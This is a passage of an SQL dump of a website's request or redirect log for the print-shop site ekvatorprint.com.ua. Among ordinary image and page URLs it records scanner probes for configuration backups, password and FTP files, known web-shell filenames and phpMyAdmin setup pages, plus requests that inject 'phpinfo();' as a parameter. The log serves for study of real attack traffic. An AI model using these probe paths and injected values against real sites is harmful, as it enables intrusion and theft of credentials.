13:29:40','0000-00-00 00:00:00',301),(8813,'http://ekvatorprint.com.ua/wp-config.php.txt',NULL,'','',3,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8814,'http://ekvatorprint.com.ua/wp-config.php.swp',NULL,'','',2,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8815,'http://ekvatorprint.com.ua/wp-config.php.save',NULL,'','',4,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8816,'http://ekvatorprint.com.ua/wp-content/',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8817,'http://ekvatorprint.com.ua/wp-content',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8818,'http://ekvatorprint.com.ua/wp-content/debug.log',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8819,'http://ekvatorprint.com.ua/wp-content/backups/',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8820,'http://ekvatorprint.com.ua/wp-content/plugins/akismet/akismet.php',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8821,'http://ekvatorprint.com.ua/wp-content/plugins/count-per-day/js/yc/d00.php',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8822,'http://ekvatorprint.com.ua/wp-content/plugins/google-sitemap-generator/sitemap-core.php',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8823,'http://ekvatorprint.com.ua/wp-content/plugins/disqus-comment-system/disqus.php',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8824,'http://ekvatorprint.com.ua/wp-content/uploads/',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8825,'http://ekvatorprint.com.ua/wp-includes',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8826,'http://ekvatorprint.com.ua/wp-includes/',NULL,'','',1,0,'2017-01-20 13:29:40','0000-00-00 00:00:00',301),(8827,'http://ekvatorprint.com.ua/wp-includes/rss-functions.php',NULL,'','',1,0,'2017-01-20 13:29:41','0000-00-00 00:00:00',301),(8828,'http://ekvatorprint.com.ua/wp-login.',NULL,'','',1,0,'2017-01-20 13:29:41','0000-00-00 00:00:00',301),(8829,'http://ekvatorprint.com.ua/wp-login',NULL,'','',1,0,'2017-01-20 13:29:41','0000-00-00 00:00:00',301),(8830,'http://ekvatorprint.com.ua/wp-register',NULL,'','',1,0,'2017-01-20 13:29:41','0000-00-00 00:00:00',301),(8831,'http://ekvatorprint.com.ua/wp-login/',NULL,'','',1,0,'2017-01-20 13:29:41','0000-00-00 00:00:00',301),(8832,'http://ekvatorprint.com.ua/wp-rss2',NULL,'','',1,0,'2017-01-20 13:29:41','0000-00-00 00:00:00',301),(8833,'http://ekvatorprint.com.ua/wp.rar/',NULL,'','',1,0,'2017-01-20 13:29:41','0000-00-00 00:00:00',301),(8834,'http://ekvatorprint.com.ua/ws.php',NULL,'','',2,0,'2017-01-20 13:29:41','0000-00-00 00:00:00',301),(8835,'http://ekvatorprint.com.ua/version/',NULL,'','',1,0,'2017-01-20 13:29:41','0000-00-00 00:00:00',301),(8836,'http://ekvatorprint.com.ua/wp.zip',NULL,'','',1,0,'2017-01-20 13:29:41','0000-00-00 00:00:00',301),(8837,'http://ekvatorprint.com.ua/wso2.5.1.php',NULL,'','',1,0,'2017-01-20 13:29:41','0000-00-00 00:00:00',301),(8838,'http://ekvatorprint.com.ua/wso2.php',NULL,'','',1,0,'2017-01-20 13:29:41','0000-00-00 00:00:00',301),(8839,'http://ekvatorprint.com.ua/ws_ftp.ini',NULL,'','',4,0,'2017-01-20 13:29:41','0000-00-00 00:00:00',301),(8840,'http://ekvatorprint.com.ua/x.php',NULL,'','',7,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8841,'http://ekvatorprint.com.ua/wwwboard/passwd.txt',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8842,'http://ekvatorprint.com.ua/xampp/phpmyadmin/scripts/setup.php',NULL,'','',2,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8843,'http://ekvatorprint.com.ua/wvdial.conf',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8844,'http://ekvatorprint.com.ua/xls/',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8845,'http://ekvatorprint.com.ua/wwwstats.htm',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8846,'http://ekvatorprint.com.ua/xampp/phpmyadmin/',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8847,'http://ekvatorprint.com.ua/xd.php',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8848,'http://ekvatorprint.com.ua/xml/_common.xml',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8849,'http://ekvatorprint.com.ua/xml/common.xml',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8850,'http://ekvatorprint.com.ua/xphpMyAdmin/',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8851,'http://ekvatorprint.com.ua/zabbix/',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8852,'http://ekvatorprint.com.ua/xmlrpc_server.php',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8853,'http://ekvatorprint.com.ua/xsl/',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8854,'http://ekvatorprint.com.ua/xphperrors.log',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8855,'http://ekvatorprint.com.ua/xsl/_common.xsl',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8856,'http://ekvatorprint.com.ua/zeroclipboard.swf',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8857,'http://ekvatorprint.com.ua/xsl/common.xsl',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8858,'http://ekvatorprint.com.ua/zebra.conf',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8859,'http://ekvatorprint.com.ua/xsql/lib/XSQLConfig.xml',NULL,'','',1,0,'2017-01-20 13:29:42','0000-00-00 00:00:00',301),(8860,'http://ekvatorprint.com.ua/zehir.php',NULL,'','',1,0,'2017-01-20 13:29:43','0000-00-00 00:00:00',301),(8861,'http://ekvatorprint.com.ua/zone-h.php',NULL,'','',1,0,'2017-01-20 13:29:43','0000-00-00 00:00:00',301),(8862,'http://ekvatorprint.com.ua/zf_backend.php',NULL,'','',1,0,'2017-01-20 13:29:43','0000-00-00 00:00:00',301),(8863,'http://ekvatorprint.com.ua/wp-content/plugins/akismet/admin.php',NULL,'','',1,0,'2017-01-20 13:29:43','0000-00-00 00:00:00',301),(8864,'http://ekvatorprint.com.ua/modulnye-kartinyа',NULL,'','',1,0,'2017-01-21 18:08:44','0000-00-00 00:00:00',301),(8865,'http://ekvatorprint.com.ua/Everglow, Fungila Jr, DavidLink</a> e <a href=',NULL,'','',1,0,'2017-01-21 20:49:15','0000-00-00 00:00:00',301),(8866,'http://ekvatorprint.com.ua/Everglow, noye, Fungila Jr</a> e <a href=',NULL,'','',1,0,'2017-01-21 20:49:21','0000-00-00 00:00:00',301),(8867,'http://ekvatorprint.com.ua/Everglow, noye, ciel</a> e <a href=',NULL,'','',1,0,'2017-01-21 20:49:25','0000-00-00 00:00:00',301),(8868,'http://ekvatorprint.com.ua/Fran, muffin, D e v i l G a m e ~</a> e <a href=',NULL,'','',1,0,'2017-01-21 20:49:37','0000-00-00 00:00:00',301),(8869,'http://ekvatorprint.com.ua/NaRayquaza, D e v i l G a m e ~, dream´</a> e <a href=',NULL,'','',1,0,'2017-01-21 20:49:41','0000-00-00 00:00:00',301),(8870,'http://ekvatorprint.com.ua/ciel, Crown97, Axel92</a> e <a href=',NULL,'','',1,0,'2017-01-21 20:50:09','0000-00-00 00:00:00',301),(8871,'http://ekvatorprint.com.ua/ciel, dinerd, Fungila Jr</a> e <a href=',NULL,'','',1,0,'2017-01-21 20:50:14','0000-00-00 00:00:00',301),(8872,'http://ekvatorprint.com.ua/dinerd, Crown97, Master Bicienzo-Xehanort</a> e <a href=',NULL,'','',1,0,'2017-01-21 20:50:21','0000-00-00 00:00:00',301),(8873,'http://ekvatorprint.com.ua/api.php?alabama=1',NULL,'ekvatorprint.com.ua','',2,0,'2017-01-23 06:26:41','0000-00-00 00:00:00',301),(8874,'http://ekvatorprint.com.ua/printing-on-canvasвот',NULL,'http://vk.com/away.php','',3,0,'2017-01-23 11:27:03','0000-00-00 00:00:00',301),(8875,'http://ekvatorprint.com.ua/index_old.php',NULL,'ekvatorprint.com.ua','',3,0,'2017-01-25 06:11:57','0000-00-00 00:00:00',301),(8876,'http://ekvatorprint.com.ua/administrator/components/com_virtuemart/classes/shipping/flex.ini',NULL,'','',2,0,'2017-01-25 08:56:53','0000-00-00 00:00:00',301),(8877,'http://ekvatorprint.com.ua//administrator/components/com_virtuemart/assets/css/admin_ui.css',NULL,'','',2,0,'2017-01-25 08:56:53','0000-00-00 00:00:00',301),(8878,'http://ekvatorprint.com.ua/modules/mod_j2module/mod_j2module.php',NULL,'ekvatorprint.com.ua','',14,0,'2017-01-27 14:12:48','0000-00-00 00:00:00',301),(8879,'http://ekvatorprint.com.ua/index.php/gaestebuch',NULL,'','',3,0,'2017-01-28 22:12:01','0000-00-00 00:00:00',301),(8880,'http://ekvatorprint.com.ua/language/en-gb/en-gb.xml',NULL,'http://ekvatorprint.com.ua/language/en-gb/en-gb.xml','',1,0,'2017-01-29 01:59:56','0000-00-00 00:00:00',301),(8881,'http://ekvatorprint.com.ua/lettings/487/denmark-road--winton--bournemouth-bh9',NULL,'','',1,0,'2017-01-31 00:16:04','0000-00-00 00:00:00',301),(8882,'http://ekvatorprint.com.ua/http://ekvatorprint.com.ua/images/modulnie kartini/мк-129.png',NULL,'','',110,0,'2017-01-31 15:12:44','0000-00-00 00:00:00',301),(8883,'http://ekvatorprint.com.ua/media/gass.php',NULL,'','',2,0,'2017-01-31 23:35:19','0000-00-00 00:00:00',301),(8884,'http://ekvatorprint.com.ua/media/ds.txt',NULL,'','',1,0,'2017-01-31 23:35:20','0000-00-00 00:00:00',301),(8885,'http://ekvatorprint.com.ua/anwaltssuche/',NULL,'','',1,0,'2017-02-01 19:09:58','0000-00-00 00:00:00',301),(8886,'http://ekvatorprint.com.ua/fortbildung/seminare/',NULL,'','',1,0,'2017-02-01 19:10:06','0000-00-00 00:00:00',301),(8887,'http://ekvatorprint.com.ua/gallery/open-air-stage-nature-one-2015',NULL,'','',1,0,'2017-02-01 19:10:15','0000-00-00 00:00:00',301),(8888,'http://ekvatorprint.com.ua/home/datenschutz/',NULL,'','',1,0,'2017-02-01 19:12:45','0000-00-00 00:00:00',301),(8889,'http://ekvatorprint.com.ua/impressum',NULL,'','',1,0,'2017-02-01 19:13:47','0000-00-00 00:00:00',301),(8890,'http://ekvatorprint.com.ua/kleinanzeigen/',NULL,'','',1,0,'2017-02-01 19:14:38','0000-00-00 00:00:00',301),(8891,'http://ekvatorprint.com.ua/leistungen/gruppenvertraege-und-rabatte/',NULL,'','',1,0,'2017-02-01 19:14:47','0000-00-00 00:00:00',301),(8892,'http://ekvatorprint.com.ua/mitglied-werden/',NULL,'','',1,0,'2017-02-01 19:15:02','0000-00-00 00:00:00',301),(8893,'http://ekvatorprint.com.ua/stellenmarkt-kleinanzeigen/',NULL,'','',1,0,'2017-02-01 19:15:08','0000-00-00 00:00:00',301),(8894,'http://ekvatorprint.com.ua/stellenmarkt/',NULL,'','',1,0,'2017-02-01 19:15:25','0000-00-00 00:00:00',301),(8895,'http://ekvatorprint.com.ua/stellenmarkt/angebote/',NULL,'','',1,0,'2017-02-01 19:15:32','0000-00-00 00:00:00',301),(8896,'http://ekvatorprint.com.ua/stellenmarkt/anzeige-veroeffentlichen/',NULL,'','',1,0,'2017-02-01 19:15:37','0000-00-00 00:00:00',301),(8897,'http://ekvatorprint.com.ua/stellenmarkt/gesuche/',NULL,'','',1,0,'2017-02-01 19:16:26','0000-00-00 00:00:00',301),(8898,'http://ekvatorprint.com.ua/stellenmarkt/gesuche/anzeige/detail/rechtsfachwirtin/',NULL,'','',1,0,'2017-02-01 19:16:31','0000-00-00 00:00:00',301),(8899,'http://ekvatorprint.com.ua/ueber-uns/der-hav-stellt-sich-vor/',NULL,'','',1,0,'2017-02-01 19:16:39','0000-00-00 00:00:00',301),(8900,'http://ekvatorprint.com.ua/veranstaltungen/kunst-kultur/',NULL,'','',1,0,'2017-02-01 19:16:46','0000-00-00 00:00:00',301),(8901,'http://ekvatorprint.com.ua/TURKISHSPYHACKER WAS HERE',NULL,'','',1,0,'2017-02-02 14:32:55','0000-00-00 00:00:00',301),(8902,'http://ekvatorprint.com.ua/wp-demr.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-02-02 22:43:28','0000-00-00 00:00:00',301),(8903,'http://ekvatorprint.com.ua/trebovaniya.Ссылка',NULL,'','',2,0,'2017-02-04 09:58:48','0000-00-00 00:00:00',301),(8904,'http://ekvatorprint.com.ua/trebovaniya.',NULL,'','',1,0,'2017-02-04 09:59:35','0000-00-00 00:00:00',301),(8905,'http://ekvatorprint.com.ua/index.php/wp-json/wp/v2/posts/',NULL,'','',5,0,'2017-02-05 12:22:02','0000-00-00 00:00:00',301),(8906,'http://ekvatorprint.com.ua/cachee/logo_img.php',NULL,'http://ekvatorprint.com.ua/cachee/logo_img.php','',2,0,'2017-02-06 16:59:40','0000-00-00 00:00:00',301),(8907,'http://ekvatorprint.com.ua/eca01b672f30e41069a345b29bdc3526',NULL,'','',1,0,'2017-02-06 18:44:22','0000-00-00 00:00:00',301),(8908,'http://ekvatorprint.com.ua/a1offau08f10z81n.php?R01=phpinfo();',NULL,'','',1,0,'2017-02-08 18:37:07','0000-00-00 00:00:00',301),(8909,'http://ekvatorprint.com.ua/includes/phpmailer/indexg.php',NULL,'','',1,0,'2017-02-08 22:46:39','0000-00-00 00:00:00',301),(8910,'http://ekvatorprint.com.ua/a7offau12fn0f83f.php?R01=phpinfo();',NULL,'','',1,0,'2017-02-09 19:01:30','0000-00-00 00:00:00',301),(8911,'http://ekvatorprint.com.ua/administrator/components/com_virtuemart/virtuemart.xml',NULL,'','',1,0,'2017-02-10 04:53:44','0000-00-00 00:00:00',301),(8912,'http://ekvatorprint.com.ua/wp-syst.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-02-10 05:17:50','0000-00-00 00:00:00',301),(8913,'http://ekvatorprint.com.ua/logs/logo_img.php',NULL,'http://ekvatorprint.com.ua/logs/logo_img.php','',7,0,'2017-02-10 16:50:20','0000-00-00 00:00:00',301),(8914,'http://ekvatorprint.com.ua/cli/logo_img.php',NULL,'http://ekvatorprint.com.ua/cli/logo_img.php','',8,0,'2017-02-10 16:50:21','0000-00-00 00:00:00',301),(8915,'http://ekvatorprint.com.ua/images/modulnie kartini/',NULL,'','',1,0,'2017-02-11 06:52:08','0000-00-00 00:00:00',301),(8916,'http://ekvatorprint.com.ua/images/modulnie kartini/',NULL,'','',1,0,'2017-02-11 07:24:41','0000-00-00 00:00:00',301),(8917,'http://ekvatorprint.com.ua/a7offau08fn0f81n.php?RUCENTER=phpinfo();',NULL,'','',1,0,'2017-02-12 14:06:22','0000-00-00 00:00:00',301),(8918,'http://ekvatorprint.com.ua/printing-on-c',NULL,'','',5,0,'2017-02-13 14:11:38','0000-00-00 00:00:00',301),(8919,'http://ekvatorprint.com.ua/docs/logo_img.php',NULL,'http://ekvatorprint.com.ua/docs/logo_img.php','',1,0,'2017-02-14 18:11:05','0000-00-00 00:00:00',301),(8920,'http://ekvatorprint.com.ua/print-photoпечать',NULL,'','',5,0,'2017-02-15 11:44:47','0000-00-00 00:00:00',301),(8921,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-106.png',NULL,'','',2,0,'2017-02-18 06:34:19','0000-00-00 00:00:00',301),(8922,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-124.png',NULL,'','',2,0,'2017-02-18 06:34:34','0000-00-00 00:00:00',301),(8923,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-99.png',NULL,'','',2,0,'2017-02-18 06:34:49','0000-00-00 00:00:00',301),(8924,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-117.png',NULL,'','',2,0,'2017-02-18 06:35:04','0000-00-00 00:00:00',301),(8925,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-103.png',NULL,'','',2,0,'2017-02-18 06:35:19','0000-00-00 00:00:00',301),(8926,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-131.png',NULL,'','',2,0,'2017-02-18 06:35:34','0000-00-00 00:00:00',301),(8927,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-107.png',NULL,'','',2,0,'2017-02-18 06:35:49','0000-00-00 00:00:00',301),(8928,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-115.png',NULL,'','',2,0,'2017-02-18 06:36:04','0000-00-00 00:00:00',301),(8929,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-128.png',NULL,'','',2,0,'2017-02-18 06:36:19','0000-00-00 00:00:00',301),(8930,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-113.png',NULL,'','',2,0,'2017-02-18 06:36:34','0000-00-00 00:00:00',301),(8931,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-123.png',NULL,'','',2,0,'2017-02-18 06:37:04','0000-00-00 00:00:00',301),(8932,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-122.png',NULL,'','',2,0,'2017-02-18 06:37:19','0000-00-00 00:00:00',301),(8933,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-101.png',NULL,'','',1,0,'2017-02-18 06:37:34','0000-00-00 00:00:00',301),(8934,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-120.png',NULL,'','',2,0,'2017-02-18 06:38:04','0000-00-00 00:00:00',301),(8935,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-105.png',NULL,'','',2,0,'2017-02-18 06:38:19','0000-00-00 00:00:00',301),(8936,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-116.png',NULL,'','',2,0,'2017-02-18 06:39:34','0000-00-00 00:00:00',301),(8937,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-125.png',NULL,'','',2,0,'2017-02-18 06:40:04','0000-00-00 00:00:00',301),(8938,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-108.png',NULL,'','',2,0,'2017-02-18 06:40:19','0000-00-00 00:00:00',301),(8939,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-118.png',NULL,'','',2,0,'2017-02-18 06:43:04','0000-00-00 00:00:00',301),(8940,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-126.png',NULL,'','',2,0,'2017-02-18 06:43:19','0000-00-00 00:00:00',301),(8941,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-112.png',NULL,'','',2,0,'2017-02-18 06:45:04','0000-00-00 00:00:00',301),(8942,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-104.png',NULL,'','',2,0,'2017-02-18 06:45:19','0000-00-00 00:00:00',301),(8943,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-111.png',NULL,'','',2,0,'2017-02-18 06:48:34','0000-00-00 00:00:00',301),(8944,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-119.png',NULL,'','',2,0,'2017-02-18 06:48:49','0000-00-00 00:00:00',301),(8945,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-121.png',NULL,'','',2,0,'2017-02-18 06:49:49','0000-00-00 00:00:00',301),(8946,'http://ekvatorprint.com.ua/images/portfolio/plotternaya-podrezka/плоттерная+подрезка+в+ЭкваторПринт.png',NULL,'','',2,0,'2017-02-18 06:51:04','0000-00-00 00:00:00',301),(8947,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-102.png',NULL,'','',2,0,'2017-02-18 06:51:19','0000-00-00 00:00:00',301),(8948,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-127.png',NULL,'','',2,0,'2017-02-18 06:53:04','0000-00-00 00:00:00',301),(8949,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-100.png',NULL,'','',2,0,'2017-02-18 06:53:19','0000-00-00 00:00:00',301),(8950,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-114.png',NULL,'','',2,0,'2017-02-18 06:54:04','0000-00-00 00:00:00',301),(8951,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-130.png',NULL,'','',2,0,'2017-02-18 06:54:34','0000-00-00 00:00:00',301),(8952,'http://ekvatorprint.com.ua/images/modulnie+kartini/мк-110.png',NULL,'','',2,0,'2017-02-18 06:56:04','0000-00-00 00:00:00',301),(8953,'http://ekvatorprint.com.ua/hfilter.php',NULL,'ekvatorprint.com.ua','',2,0,'2017-02-21 11:30:17','0000-00-00 00:00:00',301),(8954,'http://ekvatorprint.com.ua/wp-content/hfilter.php',NULL,'ekvatorprint.com.ua','',2,0,'2017-02-21 11:34:11','0000-00-00 00:00:00',301),(8955,'http://ekvatorprint.com.ua/wp-content/hook-filters.php',NULL,'ekvatorprint.com.ua','',2,0,'2017-02-21 11:37:43','0000-00-00 00:00:00',301),(8956,'http://ekvatorprint.com.ua/hook-filters.php',NULL,'ekvatorprint.com.ua','',6,0,'2017-02-21 11:41:59','0000-00-00 00:00:00',301),(8957,'http://ekvatorprint.com.ua/price/wp-login.php',NULL,'http://ekvatorprint.com.ua/price/wp-login.php','',6,0,'2017-02-21 20:46:47','0000-00-00 00:00:00',301),(8958,'http://ekvatorprint.com.ua/wp-content/plugins/libravatar-replace/config_all.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-02-21 22:23:07','0000-00-00 00:00:00',301),(8959,'http://ekvatorprint.com.ua/wp-content/themes/vmag/wp-search.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-02-21 22:33:08','0000-00-00 00:00:00',301),(8960,'http://ekvatorprint.com.ua/wp-content/plugins/libravatar-replace/libravatar-replace.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-02-21 22:37:21','0000-00-00 00:00:00',301),(8961,'http://ekvatorprint.com.ua/wp-content/themes/twentyfourteen/system.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-02-21 22:37:44','0000-00-00 00:00:00',301),(8962,'http://ekvatorprint.com.ua/wp-content/themes/dshopping/wp-search.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-02-21 22:44:25','0000-00-00 00:00:00',301),(8963,'http://ekvatorprint.com.ua/wp-content/themes/bootcake/index.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-02-21 22:44:43','0000-00-00 00:00:00',301),(8964,'http://ekvatorprint.com.ua/modules/mod_stat/mod_stat.php',NULL,'ekvatorprint.com.ua','',4,0,'2017-02-21 22:46:32','0000-00-00 00:00:00',301),(8965,'http://ekvatorprint.com.ua/wp-content/themes/pro-hosting/wp-search.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-02-21 22:51:49','0000-00-00 00:00:00',301),(8966,'http://ekvatorprint.com.ua/wp-content/themes/sketch/404.php',NULL,'ekvatorprint.com.ua','',4,0,'2017-02-21 22:54:31','0000-00-00 00:00:00',301),(8967,'http://ekvatorprint.com.ua/wp-content/common_1.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-02-21 23:01:07','0000-00-00 00:00:00',301),(8968,'http://ekvatorprint.com.ua/wp-content/themes/twentyseventeen/wp-search.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-02-21 23:15:56','0000-00-00 00:00:00',301),(8969,'http://ekvatorprint.com.ua/confit/img.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-02-22 09:03:05','0000-00-00 00:00:00',301),(8970,'http://ekvatorprint.com.ua/email/img.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-02-22 09:10:17','0000-00-00 00:00:00',301),(8971,'http://ekvatorprint.com.ua/img/img.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-02-22 09:10:25','0000-00-00 00:00:00',301),(8972,'http://ekvatorprint.com.ua/plugins/content/apismtp/settings.php',NULL,'','',6,0,'2017-02-23 03:12:37','0000-00-00 00:00:00',301),(8973,'http://ekvatorprint.com.ua/wp-content/plugins/google-maps-by-daniel-martyn/readme.txt',NULL,'','',1,0,'2017-02-23 18:47:14','0000-00-00 00:00:00',301),(8974,'http://ekvatorprint.com.ua/adri23.php',NULL,'http://ekvatorprint.com.ua/adri23.php','',1,0,'2017-02-25 08:56:36','0000-00-00 00:00:00',301),(8975,'http://ekvatorprint.com.ua/_input_3_up.php',NULL,'http://ekvatorprint.com.ua/_input_3_up.php','',1,0,'2017-02-25 23:01:55','0000-00-00 00:00:00',301),(8976,'http://ekvatorprint.com.ua/xGSx.php',NULL,'http://ekvatorprint.com.ua/xGSx.php','',1,0,'2017-02-25 23:56:10','0000-00-00 00:00:00',301),(8977,'http://ekvatorprint.com.ua/wp-content/plugins/gallery-slider/readme.txt',NULL,'','',6,0,'2017-02-27 01:05:07','0000-00-00 00:00:00',301),(8978,'http://ekvatorprint.com.ua/images/ui-bg_flat_75_ffffff_40x100.png',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',2,0,'2017-02-27 12:20:54','0000-00-00 00:00:00',301),(8979,'http://ekvatorprint.com.ua/images/ui-bg_highlight-soft_75_cccccc_1x100.png',NULL,'http://ekvatorprint.com.ua/printing-on-canvas','',2,0,'2017-02-27 12:20:55','0000-00-00 00:00:00',301),(8980,'http://ekvatorprint.com.ua/cg-bn/lndex.php',NULL,'ekvatorprint.com.ua','',1,0,'2017-02-27 17:45:39','0000-00-00 00:00:00',301),(8981,'http://ekvatorprint.com.ua/test/logo_img.php',NULL,'http://ekvatorprint.com.ua/test/logo_img.php','',4,0,'2017-02-27 20:20:33','0000-00-00 00:00:00',301),(8982,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-19.jpg3',NULL,'','',1,0,'2017-02-28 11:32:37','0000-00-00 00:00:00',301),(8983,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-19.jpg300',NULL,'','',1,0,'2017-02-28 11:32:39','0000-00-00 00:00:00',301),(8984,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-19.jpg300гн',NULL,'','',1,0,'2017-02-28 11:32:39','0000-00-00 00:00:00',301),(8985,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-19.jpg300РіРЅ',NULL,'','',1,0,'2017-02-28 11:32:39','0000-00-00 00:00:00',301),(8986,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-19.jpg300',NULL,'','',1,0,'2017-02-28 11:32:41','0000-00-00 00:00:00',301),(8987,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-19.jpg300г',NULL,'','',1,0,'2017-02-28 11:32:41','0000-00-00 00:00:00',301),(8988,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-19.jpg300Рі',NULL,'','',1,0,'2017-02-28 11:32:42','0000-00-00 00:00:00',301),(8989,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-19.jpg300',NULL,'','',1,0,'2017-02-28 11:32:43','0000-00-00 00:00:00',301),(8990,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-19.jpg300грн',NULL,'','',1,0,'2017-02-28 11:32:43','0000-00-00 00:00:00',301),(8991,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-19.jpg300РіСЂРЅ',NULL,'','',1,0,'2017-02-28 11:32:43','0000-00-00 00:00:00',301),(8992,'http://ekvatorprint.com.ua/wp-content/plugins/g-translate/readme.txt',NULL,'','',1,0,'2017-02-28 19:56:57','0000-00-00 00:00:00',301),(8993,'http://ekvatorprint.com.ua/tmp/upxx.php',NULL,'http://ekvatorprint.com.ua/tmp/upxx.php','',2,0,'2017-03-01 00:49:41','0000-00-00 00:00:00',301),(8994,'http://ekvatorprint.com.ua/index.php/en/?option=com_intranet&view=calendar&month=3&year=1',NULL,'http://www.google.com/','',3,0,'2017-03-01 19:50:22','0000-00-00 00:00:00',301),(8995,'http://ekvatorprint.com.ua/s.php?waled',NULL,'http://ekvatorprint.com.ua/s.php?waled','',1,0,'2017-03-01 23:05:40','0000-00-00 00:00:00',301),(8996,'http://ekvatorprint.com.ua/print-great-photos/wp-login.php',NULL,'http://ekvatorprint.com.ua/print-great-photos/wp-login.php','',4,0,'2017-03-02 06:14:20','0000-00-00 00:00:00',301),(8997,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-132.png',NULL,'','',1,0,'2017-03-02 10:17:58','0000-00-00 00:00:00',301),(8998,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-133.png',NULL,'','',1,0,'2017-03-02 10:18:06','0000-00-00 00:00:00',301),(8999,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-001.png',NULL,'','',1,0,'2017-03-02 10:44:16','0000-00-00 00:00:00',301),(9000,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-099.png',NULL,'','',1,0,'2017-03-02 10:44:25','0000-00-00 00:00:00',301),(9001,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-72.png',NULL,'','',1,0,'2017-03-02 10:48:37','0000-00-00 00:00:00',301),(9002,'http://ekvatorprint.com.ua/images/modulnie kartini/мк-71.png',NULL,'','',1,0,'2017-03-02 10:48:44','0000-00-00 